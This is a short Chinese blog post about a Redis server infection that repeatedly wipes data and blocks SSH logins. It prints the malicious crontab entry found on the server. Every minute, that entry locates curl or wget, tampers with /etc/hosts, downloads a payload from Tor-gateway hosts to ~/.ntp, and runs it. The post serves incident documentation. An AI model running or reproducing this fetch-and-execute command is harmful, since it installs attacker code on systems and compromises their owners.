REDIS0006病毒的发现和解决

发现服务器SSH无法登录,最关键的是redis数据被反复清除,后来发现是redis中毒了,有些类似以前的挖坑病毒。基本特征为:
1:会定时清理redis数据
2:SSH无法登录,更改后也无法登录
这个病毒在定时任务里面,每分钟会做一些事情,没详细看,具体的病毒为:

*/1 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(cu
rl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" !=
 "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && cur
l="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc
 "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do 
strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi
; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" 
> /etc/hosts >/dev/null 2>&1; fi;  ${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.t
or2web.su/src/ldm2 -o ~/.ntp||${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.tor2we
b.io/src/ldm2 -o ~/.ntp||${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.onion.sh/sr
c/ldm2 -o ~/.ntp||wget --quiet --no-check-certificate --timeout=40 https://7xffbbbebumizpe
g.tor2web.su/src/ldm2 -O ~/.ntp||wget --quiet --no-check-certificate --timeout=40 https://
7xffbbbebumizpeg.tor2web.io/src/ldm2 -O ~/.ntp||wget --quiet --no-check-certificate --time
out=40 https://7xffbbbebumizpeg.onion.sh/src/ldm2 -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.n
tp

标签: none

添加新评论